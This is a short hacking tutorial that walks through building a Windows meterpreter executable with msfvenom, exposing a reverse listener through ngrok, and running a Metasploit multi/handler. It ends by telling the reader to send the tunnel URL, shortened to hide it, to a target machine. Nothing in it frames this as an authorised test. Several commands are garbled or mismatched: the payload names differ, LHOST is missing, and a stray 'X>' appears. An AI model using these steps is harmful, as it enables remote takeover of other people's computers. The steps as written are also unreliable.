Msfvenom with ngrok Kali Linux Tutorial – HackingVision

How to use Msfvenom with ngrok Kali Linux Tutorial – HackingVision

Hi, welcome to Hacking Vision. Today lets get a little more advanced in our exploits were going to hack a computer running on Windows operating system with msfvenom using reverse HTTP payload.


Step 1: ngrok

Let start sign up to ngrok and get the auth token.

Once you have signed up to ngrok you will get your auth token.  Download ngrok and unzip it with unzip /path/to/


unzip /path/to/


Once ngrok is unzipped you need to make ngrok executable using sudo chmod +x ngrok.


sudo chmod +x ngrok


Now we need to add our ngrok auth token, we can do this by using command.


 ./ngrok authtoken <YOUR_AUTH_TOKEN> 


Once auth token has been accepted launch ngrok using the command below.


  ./ngrok http 2323 


You can change the port to whatever port u want to open.



Copy and paste the ngrok URL.


now hit create hostname and open terminal type this command msfvenom -p windows/meterpreter/http LPORT=2323 X> hahah.exe



Step 2: Starting required services

Open a new command terminal and use commands below to start services.

service postgresql start
service apache2 start


Step 3: Launching Metasploit

Now that we have started required the required services, we can launch Metasploit.


Step 4: Multi/handler

# Enter commands below to set payload options.


set payload to windows/meterpreter/reverse_https

set lhost

set lport 2323



In command terminal use command exploit.



Pass the ngrok URL to the target machine.

You can use link shortens such as if you want to shorten the ngrok URL.



Thank you for reading, happy hacking.


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